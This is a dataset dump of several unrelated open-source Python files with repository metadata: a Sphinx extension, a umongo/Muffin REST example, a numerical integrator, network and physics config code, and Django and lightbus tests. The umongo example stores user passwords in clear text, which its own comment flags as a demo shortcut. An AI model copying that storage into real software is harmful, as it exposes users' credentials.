hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bf4f1bc2c88eea77883111bb514d3727d052d5a3 | 1,039 | py | Python | doc/ext/local.py | bneradt/libswoc | 58719322a17fe020ed2340592abb30bbfba26f2f | [
"Apache-2.0"
] | 4 | 2020-05-08T01:11:59.000Z | 2021-10-19T19:04:14.000Z | doc/ext/local.py | bneradt/libswoc | 58719322a17fe020ed2340592abb30bbfba26f2f | [
"Apache-2.0"
] | 12 | 2018-12-19T17:19:18.000Z | 2022-03-01T13:20:11.000Z | doc/ext/local.py | bneradt/libswoc | 58719322a17fe020ed2340592abb30bbfba26f2f | [
"Apache-2.0"
] | 10 | 2019-04-15T14:52:49.000Z | 2022-02-15T00:26:03.000Z | from docutils import nodes
from docutils.parsers import rst
from sphinx.domains import Domain
import os.path
# This is a place to hang git file references.
class SWOCDomain(Domain):
"""
Solid Wall Of Code.
"""
name = 'swoc'
label = 'SWOC'
data_version = 1
def make_github_link(name, rawtext, text, lineno, inliner, options={}, content=[]):
"""
This docutils role lets us link to source code via the handy :swoc:git: markup.
"""
url = 'https://github.com/SolidWallOfCode/libswoc/blob/{}/{}'
ref = 'master'
node = nodes.reference(rawtext, os.path.basename(text), refuri=url.format(ref, text), **options)
return [node], []
def setup(app):
rst.roles.register_generic_role('arg', nodes.emphasis)
rst.roles.register_generic_role('const', nodes.literal)
rst.roles.register_generic_role('pack', nodes.strong)
app.add_domain(SWOCDomain)
# this lets us do :swoc:git:`<file_path>` and link to the file on github
app.add_role_to_domain('swoc', 'git', make_github_link)
| 30.558824 | 100 | 0.688162 | 147 | 1,039 | 4.755102 | 0.537415 | 0.030043 | 0.06867 | 0.098712 | 0.11588 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001175 | 0.180943 | 1,039 | 33 | 101 | 31.484848 | 0.820212 | 0.207892 | 0 | 0 | 0 | 0 | 0.108723 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.210526 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bf5eb7600c6effe11ba9834981e9b94a78c72d11 | 630 | py | Python | vehicle_counter.py | tzechiop/Traffic-Counter-Image-Analysis | 54fbd50ed616e9e09686b8a02debe96d584486f7 | [
"MIT"
] | null | null | null | vehicle_counter.py | tzechiop/Traffic-Counter-Image-Analysis | 54fbd50ed616e9e09686b8a02debe96d584486f7 | [
"MIT"
] | null | null | null | vehicle_counter.py | tzechiop/Traffic-Counter-Image-Analysis | 54fbd50ed616e9e09686b8a02debe96d584486f7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 3 21:28:05 2016
@author: thasegawa
"""
import logging
# ============================================================================
class VehicleCounter(object):
def __init__(self, shape, divider):
self.log = logging.getLogger("vehicle_counter")
self.height, self.width = shape
self.divider = divider
self.vehicle_count = 0
def update_count(self, matches, output_image = None):
self.log.debug("Updating count using %d matches...", len(matches))
# ============================================================================
| 24.230769 | 78 | 0.48254 | 60 | 630 | 4.933333 | 0.7 | 0.074324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025048 | 0.17619 | 630 | 25 | 79 | 25.2 | 0.545279 | 0.368254 | 0 | 0 | 0 | 0 | 0.126289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf601bab0eabedcbb63dd95b687c310892810533 | 8,130 | py | Python | examples/muffin/app.py | javdrher/umongo | 7eef315cea588c4c22815effbd1e4d8c571e8aa7 | [
"MIT"
] | null | null | null | examples/muffin/app.py | javdrher/umongo | 7eef315cea588c4c22815effbd1e4d8c571e8aa7 | [
"MIT"
] | null | null | null | examples/muffin/app.py | javdrher/umongo | 7eef315cea588c4c22815effbd1e4d8c571e8aa7 | [
"MIT"
] | null | null | null | import json
import datetime
import muffin
from bson import ObjectId
from aiohttp.web import json_response
from motor.motor_asyncio import AsyncIOMotorClient
from functools import partial
from umongo import Instance, Document, fields, ValidationError, set_gettext
from umongo.marshmallow_bonus import SchemaFromUmongo
import logging
logging.basicConfig(level=logging.DEBUG)
app = muffin.Application(__name__,
PLUGINS=(
'muffin_babel',
),
BABEL_LOCALES_DIRS=['translations']
)
db = AsyncIOMotorClient()['demo_umongo']
instance = Instance(db)
set_gettext(app.ps.babel.gettext)
@app.ps.babel.locale_selector
def set_locale(request):
"""Get locale based on request Accept-Language header"""
return app.ps.babel.select_locale_by_request(request)
class MongoJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
elif isinstance(obj, ObjectId):
return str(obj)
return json.JSONEncoder.default(self, obj)
def jsonify(request, *args, **kwargs):
"""
jsonify with support for MongoDB ObjectId
"""
dumps = partial(json.dumps, cls=MongoJsonEncoder, indent=True)
return json_response(dict(*args, **kwargs), dumps=dumps)
@instance.register
class User(Document):
nick = fields.StrField(required=True, unique=True)
firstname = fields.StrField()
lastname = fields.StrField()
birthday = fields.DateTimeField()
password = fields.StrField() # Don't store it in clear in real life !
async def populate_db():
await User.collection.drop()
await User.ensure_indexes()
for data in [
{
'nick': 'mze', 'lastname': 'Mao', 'firstname': 'Zedong',
'birthday': datetime.datetime(1893, 12, 26),
'password': 'Serve the people'
},
{
'nick': 'lsh', 'lastname': 'Liu', 'firstname': 'Shaoqi',
'birthday': datetime.datetime(1898, 11, 24),
'password': 'Dare to think, dare to act'
},
{
'nick': 'lxia', 'lastname': 'Li', 'firstname': 'Xiannian',
'birthday': datetime.datetime(1909, 6, 23),
'password': 'To rebel is justified'
},
{
'nick': 'ysh', 'lastname': 'Yang', 'firstname': 'Shangkun',
'birthday': datetime.datetime(1907, 7, 5),
'password': 'Smash the gang of four'
},
{
'nick': 'jze', 'lastname': 'Jiang', 'firstname': 'Zemin',
'birthday': datetime.datetime(1926, 8, 17),
'password': 'Seek truth from facts'
},
{
'nick': 'huji', 'lastname': 'Hu', 'firstname': 'Jintao',
'birthday': datetime.datetime(1942, 12, 21),
'password': 'It is good to have just 1 child'
},
{
'nick': 'xiji', 'lastname': 'Xi', 'firstname': 'Jinping',
'birthday': datetime.datetime(1953, 6, 15),
'password': 'Achieve the 4 modernisations'
}
]:
await User(**data).commit()
# Create a custom marshmallow schema from User document in order to avoid some fields
class UserNoPassSchema(User.schema.as_marshmallow_schema()):
class Meta:
read_only = ('password',)
load_only = ('password',)
no_pass_schema = UserNoPassSchema()
def dump_user_no_pass(u):
return no_pass_schema.dump(u).data
@app.register('/', methods=['GET'])
async def root(request):
return """<h1>Umongo flask example</h1>
<br>
<h3>routes:</h3><br>
<ul>
<li><a href="/users">GET /users</a></li>
<li>POST /users</li>
<li>GET /users/<nick_or_id></li>
<li>PATCH /users/<nick_or_id></li>
<li>PUT /users/<nick_or_id>/password</li>
</ul>
"""
def _to_objid(data):
try:
return ObjectId(data)
except Exception:
return None
def _nick_or_id_lookup(nick_or_id):
return {'$or': [{'nick': nick_or_id}, {'_id': _to_objid(nick_or_id)}]}
def build_error(status=400, msg=None):
if status == 404 and not msg:
msg = 'Not found'
return json_response({'message': msg}, status=status)
@app.register('/users/{nick_or_id}', methods=['GET'])
async def get_user(request):
nick_or_id = request.match_info['nick_or_id']
user = await User.find_one(_nick_or_id_lookup(nick_or_id))
if not user:
return build_error(404)
return jsonify(request, dump_user_no_pass(user))
@app.register('/users/{nick_or_id}', methods=['PATCH'])
async def update_user(request):
nick_or_id = request.match_info['nick_or_id']
payload = await request.json()
if payload is None:
return build_error(400, 'Request body must be json with Content-type: application/json')
user = await User.find_one(_nick_or_id_lookup(nick_or_id))
if not user:
return build_error(404)
# Define a custom schema from the default one to ignore read-only fields
UserUpdateSchema = User.Schema.as_marshmallow_schema(params={
'password': {'dump_only': True},
'nick': {'dump_only': True}
})()
# with `strict`, marshmallow raise ValidationError if something is wrong
schema = UserUpdateSchema(strict=True)
try:
data, _ = schema.load(payload)
user.update(data)
await user.commit()
except ValidationError as ve:
return build_error(400, ve.args[0])
return jsonify(request, dump_user_no_pass(user))
@app.register('/users/{nick_or_id}', methods=['DELETE'])
async def delete_user(request):
nick_or_id = request.match_info['nick_or_id']
user = await User.find_one(_nick_or_id_lookup(nick_or_id))
if not user:
return build_error(404)
try:
await user.remove()
except ValidationError as ve:
return build_error(400, ve.args[0])
return 'Ok'
@app.register('/users/{nick_or_id}/password', methods=['PUT'])
async def change_password_user(request):
nick_or_id = request.match_info['nick_or_id']
payload = await request.json()
if payload is None:
return build_error(400, 'Request body must be json with Content-type: application/json')
user = await User.find_one(_nick_or_id_lookup(nick_or_id))
if not user:
return build_error(404, 'Not found')
# Use a field from our document to create a marshmallow schema
# Note that we use `SchemaFromUmongo` to get unknown fields check on
# deserialization and skip missing fields instead of returning None
class ChangePasswordSchema(SchemaFromUmongo):
password = User.schema.fields['password'].as_marshmallow_field(params={'required': True})
# with `strict`, marshmallow raises a ValidationError if something is wrong
schema = ChangePasswordSchema(strict=True)
try:
data, _ = schema.load(payload)
user.password = data['password']
await user.commit()
except ValidationError as ve:
return build_error(400, ve.args[0])
return jsonify(request, dump_user_no_pass(user))
@app.register('/users', methods=['GET'])
async def list_users(request):
page = int(request.GET.get('page', 1))
per_page = 10
cursor = User.find(limit=per_page, skip=(page - 1) * per_page)
return jsonify(request, {
'_total': (await cursor.count()),
'_page': page,
'_per_page': per_page,
'_items': [dump_user_no_pass(u) for u in (await cursor.to_list(per_page))]
})
@app.register('/users', methods=['POST'])
async def create_user(request):
payload = await request.json()
if payload is None:
return build_error(400, 'Request body must be json with Content-type: application/json')
try:
user = User(**payload)
await user.commit()
except ValidationError as ve:
return build_error(400, ve.args[0])
return jsonify(request, dump_user_no_pass(user))
if __name__ == '__main__':
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(populate_db())
# Needed to bootstrap plugins
loop.run_until_complete(app.start())
from aiohttp import web
web.run_app(app, port=5000)
| 31.882353 | 97 | 0.651661 | 1,046 | 8,130 | 4.893881 | 0.269598 | 0.031647 | 0.042196 | 0.025982 | 0.32018 | 0.302989 | 0.279742 | 0.269389 | 0.246337 | 0.246337 | 0 | 0.017003 | 0.218696 | 8,130 | 254 | 98 | 32.007874 | 0.788885 | 0.080443 | 0 | 0.231156 | 0 | 0 | 0.17591 | 0.017054 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035176 | false | 0.135678 | 0.060302 | 0.01005 | 0.291457 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bf64e15c2ae7fbe778bd815cba2fe89218f46d8c | 1,284 | py | Python | flux/trapezoidal.py | AaronDJohnson/fbtpoint | d5f84006b7b5a53cbf92a9e763f8a6913b86233e | [
"MIT"
] | 1 | 2021-01-19T19:14:03.000Z | 2021-01-19T19:14:03.000Z | flux/trapezoidal.py | AaronDJohnson/fbtpoint | d5f84006b7b5a53cbf92a9e763f8a6913b86233e | [
"MIT"
] | null | null | null | flux/trapezoidal.py | AaronDJohnson/fbtpoint | d5f84006b7b5a53cbf92a9e763f8a6913b86233e | [
"MIT"
] | null | null | null | import numpy as np
def trapezoidal_rule(f, a, b, tol=1e-8):
"""
The trapezoidal rule is known to be very accurate for
oscillatory integrals integrated over their period.
See papers on spectral integration (it's just the composite trapezoidal rule....)
TODO (aaron): f is memoized to get the already computed points quickly.
Ideally, we should put this into a C++ function and call it with Cython. (Maybe someday)
"""
# endpoints first:
num = 2
dx = b - a
res0 = 1e30
res1 = 0.5 * dx * (f(b) + f(a))
delta_res = res0 - res1
re_err = np.abs(np.real(delta_res))
im_err = np.abs(np.imag(delta_res))
while re_err > tol or im_err > tol:
res0 = res1
num = 2 * num - 1
# print(num)
x = np.linspace(a, b, num=num)
res = 0
dx = (x[1] - x[0])
res += f(x[0])
for i in range(1, len(x) - 1):
res += 2 * f(x[i])
res += f(x[-1])
res1 = 0.5 * dx * res
delta_res = res1 - res0
re_err = np.abs(np.real(delta_res))
im_err = np.abs(np.imag(delta_res))
if num > 100000:
print('Integral failed to converge with', num, 'points.')
return np.nan, np.nan, np.nan
return res1, re_err, im_err | 32.1 | 92 | 0.560748 | 206 | 1,284 | 3.42233 | 0.451456 | 0.068085 | 0.04539 | 0.056738 | 0.13617 | 0.13617 | 0.13617 | 0.13617 | 0.13617 | 0.13617 | 0 | 0.041096 | 0.317757 | 1,284 | 40 | 93 | 32.1 | 0.763699 | 0.295171 | 0 | 0.148148 | 0 | 0 | 0.044674 | 0 | 0 | 0 | 0 | 0.025 | 0 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.148148 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf6bba62cfa86d75f46fc7260c7fa058af76ac89 | 2,897 | py | Python | opsrest/custom/basecontroller.py | chinhtle/ops-restd | ab3599a0b8b4df99c35b3f99de6948b2c41630d5 | [
"Apache-2.0"
] | null | null | null | opsrest/custom/basecontroller.py | chinhtle/ops-restd | ab3599a0b8b4df99c35b3f99de6948b2c41630d5 | [
"Apache-2.0"
] | null | null | null | opsrest/custom/basecontroller.py | chinhtle/ops-restd | ab3599a0b8b4df99c35b3f99de6948b2c41630d5 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2015-2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from opsrest.constants import\
REST_VERSION_PATH, OVSDB_SCHEMA_SYSTEM_URI, OVSDB_SCHEMA_CONFIG
from opsrest.exceptions import MethodNotAllowed, NotFound
from opsrest.patch import create_patch, apply_patch
from tornado import gen
class BaseController():
"""
BaseController base controller class with generic
CRUD operations.
"""
def __init__(self, context=None):
self.base_uri_path = ""
self.context = context
self.initialize()
def initialize(self):
pass
@gen.coroutine
def create(self, data, current_user=None, query_args=None):
raise MethodNotAllowed
@gen.coroutine
def update(self, item_id, data, current_user=None, query_args=None):
raise MethodNotAllowed
@gen.coroutine
def delete(self, item_id, current_user=None, query_args=None):
raise MethodNotAllowed
@gen.coroutine
def get(self, item_id, current_user=None, selector=None, query_args=None):
raise MethodNotAllowed
@gen.coroutine
def get_all(self, current_user=None, selector=None, query_args=None):
raise MethodNotAllowed
@gen.coroutine
def create_uri(self, item_id):
return REST_VERSION_PATH + OVSDB_SCHEMA_SYSTEM_URI + "/" +\
self.base_uri_path + "/" + item_id
@gen.coroutine
def patch(self, item_id, data, current_user=None, query_args=None):
try:
# Get the resource's JSON to patch
resource_json = self.get(item_id, current_user,
OVSDB_SCHEMA_CONFIG)
if resource_json is None:
raise NotFound
# Create and verify patch
(patch, needs_update) = create_patch(data)
# Apply patch to the resource's JSON
patched_resource = apply_patch(patch, resource_json)
# Update resource only if needed, since a valid
# patch can contain PATCH_OP_TEST operations
# only, which do not modify the resource
if needs_update:
self.update(item_id, patched_resource, current_user)
# In case the resource doesn't implement GET/PUT
except MethodNotAllowed:
raise MethodNotAllowed("PATCH not allowed on resource")
| 33.686047 | 78 | 0.678288 | 370 | 2,897 | 5.151351 | 0.381081 | 0.04617 | 0.055089 | 0.053515 | 0.262329 | 0.262329 | 0.251836 | 0.21511 | 0.21511 | 0.21511 | 0 | 0.00554 | 0.25233 | 2,897 | 85 | 79 | 34.082353 | 0.874423 | 0.319986 | 0 | 0.272727 | 0 | 0 | 0.016054 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.204545 | false | 0.022727 | 0.090909 | 0.022727 | 0.340909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf6c8896b3823d91e05bd42f0104f9e302b14adf | 1,417 | py | Python | RecoLocalCalo/Configuration/python/ecalLocalRecoSequenceCosmics_cff.py | Purva-Chaudhari/cmssw | 32e5cbfe54c4d809d60022586cf200b7c3020bcf | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoLocalCalo/Configuration/python/ecalLocalRecoSequenceCosmics_cff.py | Purva-Chaudhari/cmssw | 32e5cbfe54c4d809d60022586cf200b7c3020bcf | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoLocalCalo/Configuration/python/ecalLocalRecoSequenceCosmics_cff.py | Purva-Chaudhari/cmssw | 32e5cbfe54c4d809d60022586cf200b7c3020bcf | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
# Calo geometry service model
#
# removed by tommaso
#
#ECAL conditions
# include "CalibCalorimetry/EcalTrivialCondModules/data/EcalTrivialCondRetriever.cfi"
#
#TPG condition needed by ecalRecHit producer if TT recovery is ON
from RecoLocalCalo.EcalRecProducers.ecalRecHitTPGConditions_cff import *
#ECAL reconstruction
from RecoLocalCalo.EcalRecProducers.ecalWeightUncalibRecHit_cfi import *
from RecoLocalCalo.EcalRecProducers.ecalFixedAlphaBetaFitUncalibRecHit_cfi import *
from RecoLocalCalo.EcalRecProducers.ecalRecHit_cff import *
ecalRecHit.cpu.EBuncalibRecHitCollection = 'ecalFixedAlphaBetaFitUncalibRecHit:EcalUncalibRecHitsEB'
ecalRecHit.cpu.EEuncalibRecHitCollection = 'ecalFixedAlphaBetaFitUncalibRecHit:EcalUncalibRecHitsEE'
ecalRecHit.cpu.ChannelStatusToBeExcluded = [
'kDAC',
'kNoLaser',
'kNoisy',
'kNNoisy',
'kFixedG6',
'kFixedG1',
'kFixedG0',
'kNonRespondingIsolated',
'kDeadVFE',
'kDeadFE',
'kNoDataNoTP'
]
from RecoLocalCalo.EcalRecProducers.ecalPreshowerRecHit_cfi import *
from RecoLocalCalo.EcalRecProducers.ecalDetIdToBeRecovered_cfi import *
ecalLocalRecoTaskCosmics = cms.Task(
ecalFixedAlphaBetaFitUncalibRecHit,
ecalWeightUncalibRecHit,
ecalDetIdToBeRecovered,
ecalCalibratedRecHitTask,
ecalPreshowerRecHit
)
ecalLocalRecoSequenceCosmics = cms.Sequence(ecalLocalRecoTaskCosmics)
| 33.738095 | 100 | 0.819337 | 106 | 1,417 | 10.896226 | 0.59434 | 0.088312 | 0.171429 | 0.067532 | 0.109091 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002387 | 0.112915 | 1,417 | 41 | 101 | 34.560976 | 0.916468 | 0.161609 | 0 | 0 | 0 | 0 | 0.175722 | 0.112054 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.233333 | 0 | 0.233333 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf714ad8fd6286252d03542ce325ec9f5d78e4a5 | 2,375 | py | Python | photoapp/tests.py | johnmwangi/Gallery_jpG | e8c9874cbedf519c522f7e313a3bdfd6ea193cbf | [
"MIT"
] | null | null | null | photoapp/tests.py | johnmwangi/Gallery_jpG | e8c9874cbedf519c522f7e313a3bdfd6ea193cbf | [
"MIT"
] | 5 | 2021-03-19T01:11:45.000Z | 2022-03-11T23:49:40.000Z | photoapp/tests.py | johnmwangi/Gallery_jpG | e8c9874cbedf519c522f7e313a3bdfd6ea193cbf | [
"MIT"
] | null | null | null | from django.test import TestCase
from .models import *
# Create your tests here.
class ImageTest(TestCase):
# # def class instance setup for the project
# def setUp(self):
# self.nairobi = Location(name='nairobi')
# self.nairobi.save()
#
# self.nature = Category(name='nature')
# self.nature.save()
#
# self.new_image = Image(name="New Image",description="An Image",location=self.nairobi,category=self.nature)
# self.new_image.save()
#
# # def a testcase for instance of the drinks class
def test_instance(self):
self.new_image.save()
self.assertTrue(isinstance(self.new_image, Image))
#
# def test_delete_image(self):
# self.drinks.save()
# self.drinks.delete()
# self.assertTrue(len(Image.objects.all()) == 0)
#
# def test_update(self):
# self.drinks.save()
# self.drinks.name = 'MoreDrinks'
# self.assertTrue(self.drinks.name == 'MoreDrinks')
#
# def test_all_images(self):
# self.drinks.save()
# images = Image.all_images()
# self.assertTrue(len(images) > 0)
#
# def test_search_by_category(self):
# self.drinks.save()
# images = Image.search_by_category('fun')
# self.assertTrue(len(images) > 0)
#
# def test_view_location(self):
# self.drinks.save()
# location = Image.view_location(self.nairobi)
# self.assertTrue(len(location) > 0)
#
# def test_view_category(self):
# self.drinks.save()
# categories = Image.view_category(self.music)
# self.assertTrue(len(categories) > 0)
class CategoriesTest(TestCase):
def setUp(self):
self.nature = Category(name='nature')
def test_instance(self):
self.nature.save()
self.assertTrue(isinstance(self.nature, Category))
def test_save(self):
self.nature.save_category()
categories = Category.objects.all()
self.assertTrue(len(categories)>0)
class LocationTest(TestCase):
def setUp(self):
self.nairobi = Location(name='nairobi')
def test_instance(self):
self.nairobi.save()
self.assertTrue(isinstance(self.nairobi, Location))
def test_save(self):
self.nairobi.save_location()
locations = Location.objects.all()
self.assertTrue(len(locations)>0)
| 30.063291 | 116 | 0.624421 | 277 | 2,375 | 5.252708 | 0.184116 | 0.076976 | 0.081787 | 0.074227 | 0.470103 | 0.224055 | 0.100344 | 0.057732 | 0 | 0 | 0 | 0.003889 | 0.242105 | 2,375 | 78 | 117 | 30.448718 | 0.804444 | 0.549053 | 0 | 0.269231 | 0 | 0 | 0.012683 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 1 | 0.269231 | false | 0 | 0.076923 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf78aaaa0acb465353b273336d13b89d4bd83f96 | 1,176 | py | Python | tests/config/test_structure.py | gcollard/lightbus | d04deeda8ccef5a582b79255725ca2025a085c02 | [
"Apache-2.0"
] | 178 | 2017-07-22T12:35:00.000Z | 2022-03-28T07:53:13.000Z | tests/config/test_structure.py | adamcharnock/warren | 5e7069da06cd37a8131e8c592ee957ccb73603d5 | [
"Apache-2.0"
] | 26 | 2017-08-03T12:09:29.000Z | 2021-10-19T16:47:18.000Z | tests/config/test_structure.py | adamcharnock/warren | 5e7069da06cd37a8131e8c592ee957ccb73603d5 | [
"Apache-2.0"
] | 19 | 2017-09-15T17:51:24.000Z | 2022-02-28T13:00:16.000Z | import pytest
from lightbus.config.structure import make_transport_selector_structure, ApiConfig, RootConfig
pytestmark = pytest.mark.unit
def test_make_transport_config_structure():
EventTransportSelector = make_transport_selector_structure("event")
assert "redis" in EventTransportSelector.__annotations__
def test_make_api_config_structure():
assert "event_transport" in ApiConfig.__annotations__
assert "rpc_transport" in ApiConfig.__annotations__
assert "result_transport" in ApiConfig.__annotations__
assert "validate" in ApiConfig.__annotations__
def test_root_config_service_name():
service_name = RootConfig().service_name
assert service_name
assert type(service_name) == str
assert len(service_name) > 3
# No format parameters in there, should have been formatted upon instantiation
assert "{" not in service_name
def test_root_config_process_name():
